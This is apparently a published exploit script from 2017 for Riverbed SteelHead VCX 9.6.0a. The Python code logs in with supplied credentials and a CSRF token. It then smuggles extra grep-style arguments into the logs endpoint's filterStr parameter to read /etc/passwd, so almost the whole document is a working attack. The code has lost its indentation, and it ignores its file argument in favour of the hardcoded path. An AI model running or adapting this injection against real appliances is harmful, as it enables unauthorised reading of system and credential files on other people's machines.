# Exploit title : Arbitry file reading by authenticated users on Riverbed SteelHead VCX
# Vendor: Riverbed
# Author: Gregory DRAPERI <gregory.draper_at_gmail.com>
# Date: 03/2017
# Software Link: https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html
# Version: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
import sys
import requests
def exploit(address, login, password,file):
s = requests.Session()
url = address
try:
r1 = s.get(url+"/login?next=/");
cookies = requests.utils.dict_from_cookiejar(s.cookies);
csrf = cookies["csrftoken"]
authentication = {'csrfmiddlewaretoken': csrf, '_fields': "{\"username\":\""+login+"\",\"password\":\""+password+"\",\"legalAccepted\":\"N/A\",\"userAgent\":\"\"}"}
r2 = s.post(url+"/login?next=/", data=authentication)
r3 = s.get(url+"/modules/common/logs?filterStr=msg:-e .* /etc/passwd ")
print r3.text
except Exception as e:
print "\n! ERROR: %s" % e
return False
if len(sys.argv) < 4:
print "Usage: exploit.py <target> <login> <password> <file>\n"
print "Example: exploit.py http://192.168.1.2 admin password /etc/passwd\n"
quit()
target = sys.argv[1]
login = sys.argv[2]
password = sys.argv[3]
file = sys.argv[4]
exploit(target,login,password,file)
